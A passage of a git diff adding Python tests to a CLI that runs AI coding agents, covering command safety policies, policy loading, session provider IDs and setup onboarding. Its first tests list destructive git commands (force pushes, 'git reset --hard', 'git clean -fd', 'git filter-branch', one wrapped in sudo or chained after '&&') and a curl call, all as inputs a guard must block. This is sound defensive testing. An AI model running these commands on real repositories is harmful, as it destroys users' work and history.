_assert_verdicts_match("bash -c 'git push --force'", hp, sp) + + def test_empty_command(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("", hp, sp) + + def test_whitespace_command(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match(" ", hp, sp) + + def test_reset_hard_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git reset --hard HEAD~1", hp, sp) + + def test_branch_force_delete_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git branch -D feature", hp, sp) + + def test_stash_drop_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git stash drop", hp, sp) + + def test_clean_force_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git clean -fd", hp, sp) + + def test_checkout_path_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git checkout -- file.txt", hp, sp) + + def test_restore_worktree_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git restore file.txt", hp, sp) + + def test_filter_branch_blocked(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git filter-branch --all", hp, sp) + + def test_force_with_lease_allowed(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("git push --force-with-lease origin main", hp, sp) + + def test_sudo_wrapped_force_push(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("sudo git push --force", hp, sp) + + def test_disabled_network_rule_still_blocks(self) -> None: + """Network tool rules don't have per-tool policy keys, so disabling + a git rule should not affect network tool blocking.""" + hp, sp = _make_policies(rules={"block_force_push": False}) + _assert_verdicts_match("curl https://example.com", hp, sp) + + def test_pipe_chain_with_blocked_command(self) -> None: + hp, sp = _make_policies() + _assert_verdicts_match("echo ok && git push --force", hp, sp) diff --git a/tests/test_safety_eval_sync.py b/tests/test_safety_eval_sync.py new file mode 100644 index 0000000..3be5b5c --- /dev/null +++ b/tests/test_safety_eval_sync.py @@ -0,0 +1,90 @@ +"""Sync guardrail: detect drift between core originals and evaluator copies. + +The standalone scc_safety_eval package contains copies of three modules +from scc_cli.core/. The only expected differences are import lines +(scc_cli.core.X → relative .X). This test normalizes those import lines +and asserts the files are otherwise identical — if someone edits core +logic without updating the evaluator copy, this test fails. +""" + +from __future__ import annotations + +from pathlib import Path + +# ── File pairs to compare ────────────────────────────────────────────────── +_PROJECT_ROOT = Path(__file__).resolve().parent.parent + +_SYNC_PAIRS: list[tuple[Path, Path]] = [ + ( + _PROJECT_ROOT / "src" / "scc_cli" / "core" / "shell_tokenizer.py", + _PROJECT_ROOT + / "images" + / "scc-base" + / "wrappers" + / "scc_safety_eval" + / "shell_tokenizer.py", + ), + ( + _PROJECT_ROOT / "src" / "scc_cli" / "core" / "git_safety_rules.py", + _PROJECT_ROOT + / "images" + / "scc-base" + / "wrappers" + / "scc_safety_eval" + / "git_safety_rules.py", + ), + ( + _PROJECT_ROOT / "src" / "scc_cli" / "core" / "network_tool_rules.py", + _PROJECT_ROOT + / "images" + / "scc-base" + / "wrappers" + / "scc_safety_eval" + / "network_tool_rules.py", + ), +] + +# Known import-line rewrites: core → standalone +_IMPORT_NORMALIZATION = { + "from scc_cli.core.contracts": "from .contracts", + "from scc_cli.core.enums": "from .enums", + "from scc_cli.core.shell_tokenizer": "from .shell_tokenizer", +} + + +def _normalize_imports(text: str) -> str: + """Normalize core-style imports to standalone-style so files compare equal.""" + for core_form, relative_form in _IMPORT_NORMALIZATION.items(): + text = text.replace(core_form, relative_form) + return text + + +class TestSafetyEvalSync: + """Ensure evaluator copies stay in sync with core originals.""" + + def test_shell_tokenizer_in_sync(self) -> None: + core, standalone = _SYNC_PAIRS[0] + core_text = _normalize_imports(core.read_text()) + standalone_text = standalone.read_text() + assert core_text == standalone_text, ( + f"shell_tokenizer.py has drifted between core and evaluator.\n" + f"Core: {core}\nEvaluator: {standalone}" + ) + + def test_git_safety_rules_in_sync(self) -> None: + core, standalone = _SYNC_PAIRS[1] + core_text = _normalize_imports(core.read_text()) + standalone_text = standalone.read_text() + assert core_text == standalone_text, ( + f"git_safety_rules.py has drifted between core and evaluator.\n" + f"Core: {core}\nEvaluator: {standalone}" + ) + + def test_network_tool_rules_in_sync(self) -> None: + core, standalone = _SYNC_PAIRS[2] + core_text = _normalize_imports(core.read_text()) + standalone_text = standalone.read_text() + assert core_text == standalone_text, ( + f"network_tool_rules.py has drifted between core and evaluator.\n" + f"Core: {core}\nEvaluator: {standalone}" + ) diff --git a/tests/test_safety_policy_loader.py b/tests/test_safety_policy_loader.py new file mode 100644 index 0000000..053eb4e --- /dev/null +++ b/tests/test_safety_policy_loader.py @@ -0,0 +1,156 @@ +"""Tests for core.safety_policy_loader — typed policy extraction from raw org config.""" + +from __future__ import annotations + +import tokenize +from io import StringIO +from pathlib import Path +from typing import Any + +import pytest + +from scc_cli.core.contracts import SafetyPolicy +from scc_cli.core.safety_policy_loader import load_safety_policy + +# ── Helpers ────────────────────────────────────────────────────────────────── + + +def _org(safety_net: dict[str, Any]) -> dict[str, Any]: + """Build a minimal org config dict with the given safety_net section.""" + return {"security": {"safety_net": safety_net}} + + +# ── None / empty / malformed org config ────────────────────────────────────── + + +class TestDefaultBlockFallback: + """All parse failures must produce SafetyPolicy(action='block').""" + + def test_none_org_config_returns_default_block(self) -> None: + policy = load_safety_policy(None) + assert isinstance(policy, SafetyPolicy) + assert policy.action == "block" + + def test_empty_dict_returns_default_block(self) -> None: + policy = load_safety_policy({}) + assert policy.action == "block" + + def test_missing_security_key_returns_default_block(self) -> None: + policy = load_safety_policy({"other": True}) + assert policy.action == "block" + + def test_missing_safety_net_key_returns_default_block(self) -> None: + policy = load_safety_policy({"security": {"other_section": True}}) + assert policy.action == "block" + + def test_non_dict_org_config_returns_default_block(self) -> None: + # Pass a string instead of dict — should still be fail-closed. + policy = load_safety_policy("not-a-dict") # type: ignore[arg-type] + assert isinstance(policy, SafetyPolicy) + assert policy.action == "block" + + def test_non_dict_security_returns_default_block(self) -> None: + policy = load_safety_policy({"security": "string"}) + assert policy.action == "block" + + def test_non_dict_safety_net_returns_default_block(self) -> None: + policy = load_safety_policy({"security": {"safety_net": 42}}) + assert policy.action == "block" + + +# ── Valid action passthrough ───────────────────────────────────────────────── + + +class TestValidActions: + """Valid action strings must be returned unchanged.""" + + @pytest.mark.parametrize("action", ["block", "warn", "allow"]) + def test_valid_action_passthrough(self, action: str) -> None: + policy = load_safety_policy(_org({"action": action})) + assert policy.action == action + + def test_invalid_action_falls_back_to_block(self) -> None: + policy = load_safety_policy(_org({"action": "yolo"})) + assert policy.action == "block" + + def test_missing_action_falls_back_to_block(self) -> None: + policy = load_safety_policy(_org({"some_rule": True})) + assert policy.action == "block" + + +# ── Rules extraction ───────────────────────────────────────────────────────── + + +class TestRulesExtraction: + """Non-action keys must land in the rules dict.""" + + def test_rules_extracted_from_policy(self) -> None: + policy = load_safety_policy( + _org({"action": "warn", "git_push_force": False, "shell_rm_rf": True}) + ) + assert policy.action == "warn" + assert policy.rules == {"git_push_force": False, "shell_rm_rf": True} + + def test_rules_empty_when_only_action(self) -> None: + policy = load_safety_policy(_org({"action": "allow"})) + assert policy.rules == {} + + def test_source_is_set(self) -> None: + policy = load_safety_policy(_org({"action": "warn"})) + assert policy.source == "org.security.safety_net" + + +# ── Return-type invariant ──────────────────────────────────────────────────── + + +class TestReturnTypeInvariant: + """load_safety_policy must always return SafetyPolicy — never None, never raw dict.""" + + @pytest.mark.parametrize( + "org_config", + [ + None, + {}, + {"security": None}, + _org({"action": "block"}), + _org({"action": "invalid"}), + "not-a-dict", + 42, + [], + ], + ) + def test_always_returns_safety_policy(self, org_config: Any) -> None: + result = load_safety_policy(org_config) + assert isinstance(result, SafetyPolicy) + + +# ── Import guardrail ──────────────────────────────────────────────────────── + + +class TestNoDockerImport: + """safety_policy_loader.py must never import from scc_cli.docker.""" + + def test_no_import_from_docker_launch(self) -> None: + source_path = ( + Path(__file__).resolve().parent.parent + / "src" + / "scc_cli" + / "core" + / "safety_policy_loader.py" + ) + source = source_path.read_text() + + # Use tokenize to check for NAME token "docker" in import contexts. + tokens = list(tokenize.generate_tokens(StringIO(source).readline)) + + in_import = False + for tok in tokens: + if tok.type == tokenize.NAME and tok.string in ("import", "from"): + in_import = True + elif tok.type == tokenize.NEWLINE or tok.type == tokenize.NL: + in_import = False + elif in_import and tok.type == tokenize.NAME and tok.string == "docker": + pytest.fail( + "safety_policy_loader.py must not import from the docker package — " + f"found 'docker' token at line {tok.start[0]}" + ) diff --git a/tests/test_session_flags.py b/tests/test_session_flags.py index f1d42b7..20eff7c 100644 --- a/tests/test_session_flags.py +++ b/tests/test_session_flags.py @@ -173,13 +173,13 @@ def test_select_shows_session_picker(self, mock_sessions_list, mock_session): standalone_session = replace(mock_session, team=None) fake_adapters = build_fake_adapters() with ( - patch("scc_cli.commands.launch.flow.is_interactive_allowed", return_value=True), + patch("scc_cli.commands.launch.flow_session.is_interactive_allowed", return_value=True), patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False), patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), patch( "scc_cli.commands.launch.flow.sessions.get_session_service" ) as mock_service_factory, - patch("scc_cli.commands.launch.flow.pick_session") as mock_picker, + patch("scc_cli.commands.launch.flow_session.pick_session") as mock_picker, patch( "scc_cli.commands.launch.flow.get_default_adapters", return_value=fake_adapters, @@ -208,13 +208,13 @@ def test_select_short_flag_works(self, mock_sessions_list, mock_session): standalone_session = replace(mock_session, team=None) fake_adapters = build_fake_adapters() with ( - patch("scc_cli.commands.launch.flow.is_interactive_allowed", return_value=True), + patch("scc_cli.commands.launch.flow_session.is_interactive_allowed", return_value=True), patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False), patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), patch( "scc_cli.commands.launch.flow.sessions.get_session_service" ) as mock_service_factory, - patch("scc_cli.commands.launch.flow.pick_session") as mock_picker, + patch("scc_cli.commands.launch.flow_session.pick_session") as mock_picker, patch( "scc_cli.commands.launch.flow.get_default_adapters", return_value=fake_adapters, @@ -238,7 +238,7 @@ def test_select_short_flag_works(self, mock_sessions_list, mock_session): def test_select_without_sessions_shows_message(self): """--select with no sessions should show appropriate message.""" with ( - patch("scc_cli.commands.launch.flow.is_interactive_allowed", return_value=True), + patch("scc_cli.commands.launch.flow_session.is_interactive_allowed", return_value=True), patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False), patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), patch( @@ -260,13 +260,13 @@ def test_select_user_cancels_exits_gracefully(self, mock_sessions_list): # Sessions need team=None for standalone mode filtering standalone_sessions = [replace(s, team=None) for s in mock_sessions_list] with ( - patch("scc_cli.commands.launch.flow.is_interactive_allowed", return_value=True), + patch("scc_cli.commands.launch.flow_session.is_interactive_allowed", return_value=True), patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False), patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), patch( "scc_cli.commands.launch.flow.sessions.get_session_service" ) as mock_service_factory, - patch("scc_cli.commands.launch.flow.pick_session", return_value=None), + patch("scc_cli.commands.launch.flow_session.pick_session", return_value=None), ): mock_service = MagicMock() mock_service.list_recent.return_value = SessionListResult.from_sessions( @@ -292,7 +292,7 @@ def test_resume_and_select_are_mutually_exclusive(self, mock_session, mock_sessi """Using both --resume and --select should error or pick one.""" fake_adapters = build_fake_adapters() with ( - patch("scc_cli.commands.launch.flow.is_interactive_allowed", return_value=True), + patch("scc_cli.commands.launch.flow_session.is_interactive_allowed", return_value=True), patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False), patch( "scc_cli.commands.launch.flow.config.load_user_config", @@ -377,7 +377,9 @@ def test_no_detection_non_tty_shows_error(self): return_value=(None, "/home/user/random"), ), # Non-TTY environment - patch("scc_cli.commands.launch.flow.is_interactive_allowed", return_value=False), + patch( + "scc_cli.commands.launch.flow_session.is_interactive_allowed", return_value=False + ), ): result = runner.invoke(app, ["start"]) @@ -395,7 +397,7 @@ def test_non_interactive_flag_requires_workspace(self): return_value={"standalone": True}, ), patch( - "scc_cli.commands.launch.flow.is_interactive_allowed", return_value=False + "scc_cli.commands.launch.flow_session.is_interactive_allowed", return_value=False ) as mock_allowed, ): result = runner.invoke(app, ["start", "--non-interactive"]) @@ -406,7 +408,7 @@ def test_non_interactive_flag_requires_workspace(self): def test_interactive_flag_bypasses_detection(self, mock_sessions_list): """The -i flag should force interactive mode even when workspace can be detected.""" with ( - patch("scc_cli.commands.launch.flow.is_interactive_allowed", return_value=True), + patch("scc_cli.commands.launch.flow_session.is_interactive_allowed", return_value=True), patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False), patch( "scc_cli.commands.launch.flow.config.load_user_config", @@ -417,12 +419,20 @@ def test_interactive_flag_bypasses_detection(self, mock_sessions_list): "scc_cli.commands.launch.flow.git.detect_workspace_root", return_value=("/home/user/project", "/home/user/project"), ) as mock_detect, - patch("scc_cli.commands.launch.flow.config.is_standalone_mode", return_value=True), - patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value=None), - patch("scc_cli.commands.launch.flow.teams.list_teams", return_value=[]), - patch("scc_cli.commands.launch.flow.load_recent_contexts", return_value=[]), + patch( + "scc_cli.commands.launch.flow_interactive.config.is_standalone_mode", + return_value=True, + ), + patch( + "scc_cli.commands.launch.flow_interactive.config.load_cached_org_config", + return_value=None, + ), + patch("scc_cli.commands.launch.flow_interactive.teams.list_teams", return_value=[]), + patch("scc_cli.commands.launch.flow_interactive.load_recent_contexts", return_value=[]), # User selects workspace via picker - patch("scc_cli.commands.launch.flow.pick_workspace_source", return_value=None), + patch( + "scc_cli.commands.launch.flow_interactive.pick_workspace_source", return_value=None + ), ): result = runner.invoke(app, ["start", "-i"]) @@ -438,14 +448,14 @@ def test_detection_feedback_shown_on_success(self, mock_session): standalone_session = replace(mock_session, team=None) fake_adapters = build_fake_adapters() with ( - patch("scc_cli.commands.launch.flow.is_interactive_allowed", return_value=True), + patch("scc_cli.commands.launch.flow_session.is_interactive_allowed", return_value=True), patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False), patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), patch( "scc_cli.commands.launch.flow.sessions.get_session_service" ) as mock_service_factory, patch( - "scc_cli.commands.launch.flow.pick_session", + "scc_cli.commands.launch.flow_session.pick_session", return_value=standalone_session, ), patch( diff --git a/tests/test_session_provider_id.py b/tests/test_session_provider_id.py new file mode 100644 index 0000000..273871d --- /dev/null +++ b/tests/test_session_provider_id.py @@ -0,0 +1,136 @@ +"""Tests for provider_id threading through session models and services.""" + +from __future__ import annotations + +from scc_cli.ports.session_models import ( + SessionFilter, + SessionRecord, + SessionSummary, +) + + +class TestSessionRecordProviderIdField: + """SessionRecord carries provider_id through round-trip serialization.""" + + def test_provider_id_present_in_to_dict(self) -> None: + record = SessionRecord(workspace="/tmp/ws", provider_id="codex") + data = record.to_dict() + assert data["provider_id"] == "codex" + + def test_provider_id_none_omitted_from_to_dict(self) -> None: + record = SessionRecord(workspace="/tmp/ws") + data = record.to_dict() + assert "provider_id" not in data + + def test_from_dict_with_provider_id(self) -> None: + record = SessionRecord.from_dict({"workspace": "/tmp/ws", "provider_id": "claude"}) + assert record.provider_id == "claude" + + def test_from_dict_without_provider_id_defaults_none(self) -> None: + record = SessionRecord.from_dict({"workspace": "/tmp/ws"}) + assert record.provider_id is None + + def test_round_trip_preserves_provider_id(self) -> None: + original = SessionRecord(workspace="/tmp/ws", provider_id="codex", team="acme") + data = original.to_dict() + restored = SessionRecord.from_dict(data) + assert restored.provider_id == original.provider_id + assert restored.team == original.team + + def test_schema_version_defaults_to_2(self) -> None: + record = SessionRecord(workspace="/tmp/ws") + assert record.schema_version == 2 + + def test_from_dict_preserves_legacy_schema_version(self) -> None: + record = SessionRecord.from_dict({"workspace": "/tmp/ws", "schema_version": 1}) + assert record.schema_version == 1 + + +class TestSessionSummaryProviderIdField: + """SessionSummary carries provider_id.""" + + def test_provider_id_set(self) -> None: + summary = SessionSummary( + name="test", + workspace="/tmp/ws", + team=None, + last_used=None, + container_name=None, + branch=None, + provider_id="codex", + ) + assert summary.provider_id == "codex" + + def test_provider_id_defaults_none(self) -> None: + summary = SessionSummary( + name="test", + workspace="/tmp/ws", + team=None, + last_used=None, + container_name=None, + branch=None, + ) + assert summary.provider_id is None + + +class TestSessionFilterProviderIdField: + """SessionFilter supports provider_id filtering.""" + + def test_provider_id_defaults_none(self) -> None: + f = SessionFilter() + assert f.provider_id is None + + def test_provider_id_set(self) -> None: + f = SessionFilter(provider_id="claude") + assert f.provider_id == "claude" + + +class TestSessionFilterProviderIdFiltering: + """Provider-id filtering in _filter_sessions via SessionService.list_recent.""" + + def test_filter_by_provider_id(self) -> None: + from unittest.mock import MagicMock + + from scc_cli.application.sessions.use_cases import SessionService + + claude_record = SessionRecord( + workspace="/tmp/a", + provider_id="claude", + last_used="2025-01-02T00:00:00", + ) + codex_record = SessionRecord( + workspace="/tmp/b", + provider_id="codex", + last_used="2025-01-01T00:00:00", + ) + none_record = SessionRecord( + workspace="/tmp/c", + last_used="2025-01-03T00:00:00", + ) + store = MagicMock() + store.load_sessions.return_value = [claude_record, codex_record, none_record] + service = SessionService(store=store) + result = service.list_recent(SessionFilter(include_all=True, provider_id="codex")) + assert len(result.sessions) == 1 + assert result.sessions[0].provider_id == "codex" + + def test_filter_without_provider_id_returns_all(self) -> None: + from unittest.mock import MagicMock + + from scc_cli.application.sessions.use_cases import SessionService + + r1 = SessionRecord( + workspace="/tmp/a", + provider_id="claude", + last_used="2025-01-01T00:00:00", + ) + r2 = SessionRecord( + workspace="/tmp/b", + provider_id="codex", + last_used="2025-01-02T00:00:00", + ) + store = MagicMock() + store.load_sessions.return_value = [r1, r2] + service = SessionService(store=store) + result = service.list_recent(SessionFilter(include_all=True)) + assert len(result.sessions) == 2 diff --git a/tests/test_sessions.py b/tests/test_sessions.py index 8592b6f..4880eea 100644 --- a/tests/test_sessions.py +++ b/tests/test_sessions.py @@ -504,7 +504,7 @@ class TestSchemaVersion: """Tests for schema_version field in SessionRecord.""" def test_new_session_has_schema_version(self, sessions_file): - """New sessions should have schema_version=1.""" + """New sessions should have schema_version=2.""" sessions_file.write_text(json.dumps({"sessions": []})) record = sessions.record_session( @@ -512,11 +512,11 @@ def test_new_session_has_schema_version(self, sessions_file): team="dev", ) - assert record.schema_version == 1 + assert record.schema_version == 2 # Verify saved saved = json.loads(sessions_file.read_text()) - assert saved["sessions"][0].get("schema_version") == 1 + assert saved["sessions"][0].get("schema_version") == 2 def test_legacy_session_without_schema_version_defaults_to_1(self, sessions_file): """Sessions without schema_version should default to 1 when loaded.""" @@ -783,8 +783,14 @@ def test_sessions_cmd_renders_table_rows(self) -> None: call_kwargs = mock_table.call_args.kwargs assert call_kwargs["title"] == "Recent Sessions (platform)" assert call_kwargs["columns"] == [("Session", "cyan"), ("Workspace", "white")] - assert call_kwargs["wide_columns"] == [("Last Used", "yellow"), ("Team", "green")] - assert call_kwargs["rows"] == [["session-1", "..." + "a" * 37, "2h ago", "platform"]] + assert call_kwargs["wide_columns"] == [ + ("Last Used", "yellow"), + ("Team", "green"), + ("Provider", "magenta"), + ] + assert call_kwargs["rows"] == [ + ["session-1", "..." + "a" * 37, "2h ago", "platform", "claude"] + ] def test_sessions_cmd_json_output(self, capsys) -> None: from scc_cli.commands.worktree.session_commands import sessions_cmd diff --git a/tests/test_setup_characterization.py b/tests/test_setup_characterization.py new file mode 100644 index 0000000..aff8e5d --- /dev/null +++ b/tests/test_setup_characterization.py @@ -0,0 +1,192 @@ +"""Characterization tests for setup.py. + +Lock the current behavior of pure helper functions in the setup wizard +before S02 surgery. Targets: config preview building, proposed config +assembly, dotted-path config access, and config diff rendering. +""" + +from __future__ import annotations + +from typing import Any + +from scc_cli.setup import ( + _build_config_changes, + _build_config_preview, + _build_proposed_config, + _format_preview_value, + _get_config_value, +) + +# ═══════════════════════════════════════════════════════════════════════════════ +# _format_preview_value +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestFormatPreviewValue: + """Em-dash sentinel for unset values.""" + + def test_none_returns_em_dash(self) -> None: + assert _format_preview_value(None) == "—" + + def test_empty_string_returns_em_dash(self) -> None: + assert _format_preview_value("") == "—" + + def test_value_returned_as_is(self) -> None: + assert _format_preview_value("https://example.com") == "https://example.com" + + def test_whitespace_preserved(self) -> None: + assert _format_preview_value(" spaced ") == " spaced " + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _get_config_value +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestGetConfigValue: + """Dotted-path access into nested config dicts.""" + + def test_top_level_key(self) -> None: + assert _get_config_value({"standalone": True}, "standalone") == "True" + + def test_nested_key(self) -> None: + cfg = {"organization_source": {"url": "https://example.com"}} + assert _get_config_value(cfg, "organization_source.url") == "https://example.com" + + def test_missing_key_returns_none(self) -> None: + assert _get_config_value({}, "nonexistent") is None + + def test_missing_nested_key_returns_none(self) -> None: + assert _get_config_value({"a": {}}, "a.b") is None + + def test_none_value_returns_none(self) -> None: + assert _get_config_value({"key": None}, "key") is None + + def test_deep_nesting(self) -> None: + cfg: dict[str, Any] = {"a": {"b": {"c": "deep"}}} + assert _get_config_value(cfg, "a.b.c") == "deep" + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _build_proposed_config +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestBuildProposedConfig: + """Config dict assembly for write operations.""" + + def test_standalone_mode(self) -> None: + cfg = _build_proposed_config( + org_url=None, + auth=None, + auth_header=None, + profile=None, + hooks_enabled=True, + standalone=True, + ) + assert cfg["standalone"] is True + assert cfg["organization_source"] is None + assert cfg["hooks"]["enabled"] is True + assert cfg["config_version"] == "1.0.0" + + def test_organization_mode(self) -> None: + cfg = _build_proposed_config( + org_url="https://example.com/config.json", + auth="env:SCC_TOKEN", + auth_header=None, + profile="team-alpha", + hooks_enabled=False, + standalone=False, + ) + assert "standalone" not in cfg + assert cfg["organization_source"]["url"] == "https://example.com/config.json" + assert cfg["organization_source"]["auth"] == "env:SCC_TOKEN" + assert cfg["selected_profile"] == "team-alpha" + assert cfg["hooks"]["enabled"] is False + + def test_organization_mode_with_auth_header(self) -> None: + cfg = _build_proposed_config( + org_url="https://example.com", + auth="env:TOKEN", + auth_header="X-Custom-Auth", + profile="team-a", + hooks_enabled=True, + standalone=False, + ) + assert cfg["organization_source"]["auth_header"] == "X-Custom-Auth" + + def test_organization_mode_no_url(self) -> None: + cfg = _build_proposed_config( + org_url=None, + auth=None, + auth_header=None, + profile=None, + hooks_enabled=True, + standalone=False, + ) + # No org_url means no organization_source key at all + assert "organization_source" not in cfg or cfg.get("organization_source") is None + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _build_config_preview (Rich Text) +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestBuildConfigPreview: + """Config preview Rich Text output shape.""" + + def test_standalone_preview_contains_mode(self) -> None: + preview = _build_config_preview( + org_url=None, + auth=None, + auth_header=None, + profile=None, + hooks_enabled=True, + standalone=True, + ) + text = preview.plain + assert "standalone" in text.lower() + + def test_organization_preview_contains_url(self) -> None: + preview = _build_config_preview( + org_url="https://example.com/config.json", + auth="env:TOKEN", + auth_header=None, + profile="team-a", + hooks_enabled=False, + standalone=False, + ) + text = preview.plain + assert "org.url" in text + assert "example.com" in text + assert "team-a" in text + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _build_config_changes (Rich Text diff) +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestBuildConfigChanges: + """Config diff rendering for before/after comparison.""" + + def test_no_changes_detected(self) -> None: + cfg = {"standalone": True, "hooks": {"enabled": True}} + changes = _build_config_changes(cfg, cfg) + assert "no changes" in changes.plain.lower() + + def test_changes_shown(self) -> None: + before: dict[str, Any] = {"standalone": True} + after: dict[str, Any] = {"standalone": False} + changes = _build_config_changes(before, after) + text = changes.plain + assert "standalone" in text + + def test_url_change(self) -> None: + before: dict[str, Any] = {"organization_source": {"url": "https://old.com"}} + after: dict[str, Any] = {"organization_source": {"url": "https://new.com"}} + changes = _build_config_changes(before, after) + text = changes.plain + assert "old.com" in text + assert "new.com" in text diff --git a/tests/test_setup_idempotency.py b/tests/test_setup_idempotency.py new file mode 100644 index 0000000..f309571 --- /dev/null +++ b/tests/test_setup_idempotency.py @@ -0,0 +1,302 @@ +"""Tests for setup idempotency — re-running scc setup skips already-connected providers. + +Verifies: +- _prompt_provider_connections skips providers whose status is 'present' +- _run_provider_onboarding only offers connection for missing providers +- When both are connected, provider connection prompt is skipped entirely +- When one is connected, only the missing one is offered +- Preference prompt only appears when both are connected after onboarding +""" + +from __future__ import annotations + +from unittest.mock import MagicMock, patch + +from scc_cli.core.contracts import AuthReadiness +from scc_cli.setup import ( + _prompt_provider_connections, + _prompt_provider_preference, + _run_provider_onboarding, +) + + +def _readiness(status: str, guidance: str = "") -> AuthReadiness: + """Build an AuthReadiness with the given status.""" + return AuthReadiness( + status=status, + mechanism="test", + guidance=guidance, + ) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _prompt_provider_connections — skip logic +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestPromptProviderConnectionsSkipLogic: + """Verify _prompt_provider_connections skips already-connected providers.""" + + def test_both_present_returns_empty_tuple(self) -> None: + """When both providers are 'present', no connection prompt is shown.""" + console = MagicMock() + readiness = { + "claude": _readiness("present"), + "codex": _readiness("present"), + } + result = _prompt_provider_connections(console, readiness) + assert result == () + + def test_claude_present_codex_missing_offers_codex_only(self) -> None: + """When Claude is present but Codex is missing, only Codex is offered.""" + console = MagicMock() + readiness = { + "claude": _readiness("present"), + "codex": _readiness("missing", "Sign in with Codex CLI"), + } + with patch("scc_cli.setup._select_option", return_value=0) as mock_select: + result = _prompt_provider_connections(console, readiness) + + # Only Codex should be in the options — single provider + skip + # The first option should be "Connect Codex", second "Skip for now" + call_args = mock_select.call_args + options = call_args[0][1] + option_labels = [opt[0] for opt in options] + assert "Connect both" not in option_labels + assert any("Codex" in label for label in option_labels) + assert any("Claude" not in label or "Skip" in label for label in option_labels) + assert result == ("codex",) + + def test_codex_present_claude_missing_offers_claude_only(self) -> None: + """When Codex is present but Claude is missing, only Claude is offered.""" + console = MagicMock() + readiness = { + "claude": _readiness("missing", "Sign in via browser"), + "codex": _readiness("present"), + } + with patch("scc_cli.setup._select_option", return_value=0) as mock_select: + result = _prompt_provider_connections(console, readiness) + + call_args = mock_select.call_args + options = call_args[0][1] + option_labels = [opt[0] for opt in options] + assert "Connect both" not in option_labels + assert any("Claude" in label for label in option_labels) + assert result == ("claude",) + + def test_both_missing_offers_connect_both(self) -> None: + """When both providers are missing, 'Connect both' is offered first.""" + console = MagicMock() + readiness = { + "claude": _readiness("missing"), + "codex": _readiness("missing"), + } + with patch("scc_cli.setup._select_option", return_value=0) as mock_select: + result = _prompt_provider_connections(console, readiness) + + call_args = mock_select.call_args + options = call_args[0][1] + option_labels = [opt[0] for opt in options] + assert "Connect both" in option_labels + assert result == ("claude", "codex") + + def test_skip_returns_empty_tuple(self) -> None: + """When user selects 'Skip for now', empty tuple returned.""" + console = MagicMock() + readiness = { + "claude": _readiness("missing"), + "codex": _readiness("missing"), + } + # Skip is the last option + with patch("scc_cli.setup._select_option", return_value=3): + result = _prompt_provider_connections(console, readiness) + assert result == () + + def test_none_select_returns_empty_tuple(self) -> None: + """When _select_option returns None (escape), empty tuple returned.""" + console = MagicMock() + readiness = { + "claude": _readiness("missing"), + } + with patch("scc_cli.setup._select_option", return_value=None): + result = _prompt_provider_connections(console, readiness) + assert result == () + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _run_provider_onboarding — full idempotency integration +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestRunProviderOnboardingIdempotency: + """Verify _run_provider_onboarding is idempotent for already-connected providers.""" + + def test_both_connected_skips_connections_shows_preference(self) -> None: + """Re-running setup when both connected should skip connections, show preference prompt.""" + readiness = { + "claude": _readiness("present"), + "codex": _readiness("present"), + } + mock_runtime = MagicMock() + mock_adapters = MagicMock() + mock_adapters.sandbox_runtime = mock_runtime + + with ( + patch("scc_cli.setup.get_default_adapters", return_value=mock_adapters), + patch( + "scc_cli.setup.collect_provider_readiness", + return_value=readiness, + ), + patch("scc_cli.setup._prompt_provider_connections") as mock_prompt_conn, + patch("scc_cli.setup._prompt_provider_preference", return_value="ask"), + patch("scc_cli.setup.config.get_selected_provider", return_value=None), + patch("scc_cli.setup.config.set_selected_provider"), + ): + # _prompt_provider_connections returns () because both are present + mock_prompt_conn.return_value = () + console = MagicMock() + result_readiness, result_pref = _run_provider_onboarding(console) + + # No bootstrap_auth calls happened + mock_adapters.agent_provider.bootstrap_auth.assert_not_called() + # Preference prompt was shown because both are present on refresh + assert result_pref == "ask" + + def test_docker_unavailable_skips_entirely(self) -> None: + """When Docker is unavailable, provider onboarding is entirely skipped.""" + mock_runtime = MagicMock() + mock_runtime.ensure_available.side_effect = RuntimeError("no docker") + mock_adapters = MagicMock() + mock_adapters.sandbox_runtime = mock_runtime + + with ( + patch("scc_cli.setup.get_default_adapters", return_value=mock_adapters), + patch("scc_cli.setup.config.get_selected_provider", return_value=None), + ): + console = MagicMock() + result_readiness, result_pref = _run_provider_onboarding(console) + + assert result_readiness is None + assert result_pref is None + + def test_one_connected_only_bootstraps_missing(self) -> None: + """When Claude is connected, only Codex bootstrap is called.""" + readiness_before = { + "claude": _readiness("present"), + "codex": _readiness("missing"), + } + readiness_after = { + "claude": _readiness("present"), + "codex": _readiness("present"), + } + mock_runtime = MagicMock() + mock_adapters = MagicMock() + 